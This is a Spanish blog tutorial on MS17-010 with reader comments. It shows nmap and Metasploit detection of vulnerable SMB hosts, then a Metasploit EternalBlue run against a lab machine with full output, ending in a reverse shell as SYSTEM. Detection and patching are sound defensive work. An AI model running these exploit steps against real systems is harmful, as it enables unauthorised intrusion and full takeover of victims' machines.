También podríamos detener la propagación del malware deshabilitando SMBv1 o encomendándonos a San Custodio y que se haya activado un "kill switch" que reconozca la variante que nos estaba acechando pero... ¿para qué arriesgarnos?... actualiza, actualiza, ACTUALIZA!
Ahora bien, si estas en una red y no eres responsable directo de actualizar los equipos M$ de la LAN, quizás te hayan pedido o te resulte interesante }:-) saber cuáles son las máquinas que tienen el puerto 445/TCP accesible y son vulnerables. Para ello podríamos usar el escáner de Metasploit (auxiliary/scanner/smb/smb_ms17_010), aunque resulta algo más lento que el script de nmap que vamos a utilizar en principio, que es el que el pasado domingo publicó el mexicano Paulino Calderon (responsable del chapter @OWASP_riviera).
Lo que hace el script es conectarse a $IPC, ejecutar una transacción sobre FID 0 y comprobar si es devuelto el error “STATUS_INSUFF_SERVER_RESOURCES” para determinar si ha sido parcheado o no contra CVE2017-010.
https://raw.githubusercontent.com/cldrn/nmap-nse-scripts/master/scripts/smb-vuln-ms17-010.nse
Simplemente tenemos que descargar el script nse en el directorio correspondiente, por defecto:
# Linux – /usr/share/nmap/scripts/ or /usr/local/share/nmap/scripts/
# OSX – /opt/local/share/nmap/scripts/
# Windows – c:\Program Files\Nmap\Scripts
Y ejecutar:
nmap -sC -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010.nse X.X.X.X/XEjemplo NO VULNERABLE:
nmap -Pn -sC -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010.nse 192.168.1.22
Starting Nmap 7.12 ( https://nmap.org ) at 2017-05-16 1:56 CEST
Nmap scan report for 192.168.1.66
Host is up (0.00049s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 50:7B:9D:D5:05:CA (Lcfc(hefei) Electronics Technology)
Host script results:
|_smb-vuln-ms17-010: Could not connect to 'IPC$'Ejemplo VULNERABLE:
# nmap -Pn -sC -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010.nse 192.168.1.23
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-16 2:02 EDT
Nmap scan report for 192.168.1.23
Host is up (0.00069s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 0.59 secondsY ya sabéis, si la máquina es vulnerable conseguir una shell a estas alturas es trivial:
Rescaneamos con el módulo de metasploit por si acaso.
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.23
RHOSTS => 192.168.1.23
msf auxiliary(smb_ms17_010) > run
[+] 192.168.1.23:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Professional 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedUsamos el exploit https://github.com/RiskSense-Ops/MS17-010/blob/master/exploits/eternalblue/ms17_010_eternalblue.rb:
msf > use windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.1.23
RHOST => 192.168.1.23
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.114:4444
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[-] 192.168.1.23:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.23:445).
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 7 and Server 2008 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.114:4444
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[-] 192.168.1.23:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.23:445).
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > set ProcessName lsass.exe
ProcessName => lsass.exe
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.114:4444
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[-] 192.168.1.23:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.23:445).
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.114:4444
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[+] 192.168.1.23:445 - Connection established for exploitation.
[*] 192.168.1.23:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.23:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.23:445 - Starting non-paged pool grooming
[+] 192.168.1.23:445 - Sending SMBv2 buffers
[+] 192.168.1.23:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.23:445 - Sending final SMBv2 buffers.
[*] 192.168.1.23:445 - Sending last fragment of exploit packet!
[*] 192.168.1.23:445 - Receiving response from exploit packet
[+] 192.168.1.23:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.23:445 - Sending egg to corrupted connection.
[*] 192.168.1.23:445 - Triggering free of corrupted buffer.
[-] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[+] 192.168.1.23:445 - Connection established for exploitation.
[*] 192.168.1.23:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.23:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.23:445 - Starting non-paged pool grooming
[+] 192.168.1.23:445 - Sending SMBv2 buffers
[+] 192.168.1.23:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.23:445 - Sending final SMBv2 buffers.
[*] 192.168.1.23:445 - Sending last fragment of exploit packet!
[*] 192.168.1.23:445 - Receiving response from exploit packet
[+] 192.168.1.23:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.23:445 - Sending egg to corrupted connection.
[*] 192.168.1.23:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.114:4444 -> 192.168.1.23:1096) at 2017-05-16 11:12:20 -0400
[+] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [Versi�n 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\windows\system32>whoami
whoami
nt authority\system
C:\windows\system32>hostname
hostname
WINDOWS-PC1
Host script results:
ResponderEliminar|_smb-vuln-ms17-010: ERROR: Script execution failed (use -d to debug)
funciona bien en nmap 7.40
EliminarDebe se nmap 7.40.
EliminarTuve el mismo error con la versión 6.40
Este comentario ha sido eliminado por el autor.
ResponderEliminarNSE: [smb-vuln-ms17-010 10.110.55.96] SMB: Extended login to x.x.x.x as NT\guest failed (NT_STATUS_ACCOUNT_LOCKED_OUT)
ResponderEliminarhay que usar un usuario de dominio el recurso IPC NO ES GRATIS
Host script results:
ResponderEliminar|_smb-vuln-ms17-010: 1818845510
¿Que significa ese mensaje?
alguna respuesta ???
EliminarHola , ante nada Gracias por compartir tus conocimientos.. he realizado todos los pasos recomendados.. al terminar la ejecución no muestra si soy o no vulnerable: Nmap done: 256 IP addresses ( 256 hosts up )scanned in... algun comentario ? saludos
ResponderEliminarMe esta dando tres estados, los dos mencionados arriba y el tercero es que no muestra nada, segun las pruebas realizadas son en los servidores 2003, 2008 y win7 que ya tienen el parche. en los server 2012 me muestra el estado que no es vulnerable y en los que si es vulnerable sale la descripcion de la vulnerabilidad.
ResponderEliminar********** LOGS DE CUANDO NO DA RESULTADOS ******************
NSE: Starting smb-vuln-ms17-010 against 192.168.0.69.
NSE: [smb-vuln-ms17-010 192.168.0.69] SMB: Added account '' to account list
NSE: [smb-vuln-ms17-010 192.168.0.69] SMB: Added account 'guest' to account list
NSE: [smb-vuln-ms17-010 192.168.0.69] LM Password:
NSE: [smb-vuln-ms17-010 192.168.0.69] SMB: Extended login to 192.168.0.69 as XXXXXXX\guest failed (NT_STATUS_LOGON_FAILURE)
NSE: [smb-vuln-ms17-010 192.168.0.69] LM Password:
NSE: [smb-vuln-ms17-010 192.168.0.69] Connected to share 'IPC$'
NSE: [smb-vuln-ms17-010 192.168.0.69] Valid SMB_COM_TRANSACTION response received
NSE: Finished smb-vuln-ms17-010 against 192.168.0.69.
Completed NSE at 11:17, 1.03s elapsed
Nmap scan report for patia.XXXXXXX.local (192.168.0.69)
Host is up, received echo-reply ttl 127 (0.00s latency).
Scanned at 2017-05-18 11:17:07 Hora est. Pacífico, Sudamérica for 4s
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 127
Final times for host: srtt: 0 rttvar: 3750 to: 100000
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 11:17
Completed NSE at 11:17, 0.00s elapsed
Read from C:\Program Files (x86)\Nmap: nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 5.90 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
Yo obtengo lo siguiente:
ResponderEliminarNmap scan report for x.x.x.x
Host is up (0.0010s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 3.65 seconds
Alguien sabe que significa?
El script trata de conectarse como Guest, si la cuenta no está activa no puede hacer el chequeo. Algunos otros scripts (como el que se menciona en el artículo de metaploit (exploit/windows/smb/ms17_010_eternalblue) también usan NULL pero en algunos casos también está deshabilitado en Windows (sobre todo en equipos corporativos que se han securizado un poco).
ResponderEliminarEl script auxiliary/scanner/smb/smb_ms17_010 de Metasploit permite poner credenciales y como bonus además te dice si estás o no infectado con DoublePulsar.
soy yo o el script no esta mostrando el resultado??
ResponderEliminarhost script results, no me muestra esto en pantalla...
hola a todos
ResponderEliminartampoco arroja algun resultado
ya verifique y nada
me arroja esto con el script de Nmap
ResponderEliminarStarting Nmap 7.40 ( https://nmap.org ) at 2017-05-29 07:57 COT
Nmap scan report for 192.168.1.5
Host is up, received arp-response (0.066s latency).
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 128
MAC Address: B4:74:9F:7F:64:22 (Askey Computer)
Nmap done: 1 IP address (1 host up) scanned in 0.58 secons
si es vulnerable o No?
Buen post. También pueden utilizar la herramienta de Eset, que detecta si el equipo windows es vulnerable y en caso de que lo sea descarga el parche.
ResponderEliminarhttps://help.eset.com/eset_tools/ESETEternalBlueChecker.exe
Muchas gracias, lo estoy ejecutando tanto desde CMD como con el Zenmap y no me dice si es vulnerable a un equipo que se que lo es, el error:
ResponderEliminarNSE: [smb-vuln-ms17-010 10.12.31.12] SMB: Extended login to 10.12.31.12 as \guest failed, but was given guest access (username may be wrong, or system may only allow guest)
NSE: [smb-vuln-ms17-010 10.12.31.12] Connected to share 'IPC$'
NSE: [smb-vuln-ms17-010 10.12.31.12] SMB: Sending packet failed after 5 tries! Giving up.
NSE: smb-vuln-ms17-010 against 10.12.31.12 threw an error!
C:\Program Files (x86)\Nmap/scripts\smb-vuln-ms17-010.nse:122: variable 'result' is not declared
stack traceback:
[C]: in function 'error'
C:\Program Files (x86)\Nmap/nselib/strict.lua:80: in metamethod '__index'
C:\Program Files (x86)\Nmap/scripts\smb-vuln-ms17-010.nse:122: in upvalue 'check_ms17010'
C:\Program Files (x86)\Nmap/scripts\smb-vuln-ms17-010.nse:173: in function
(...tail calls...)
¿me puedes ayudar?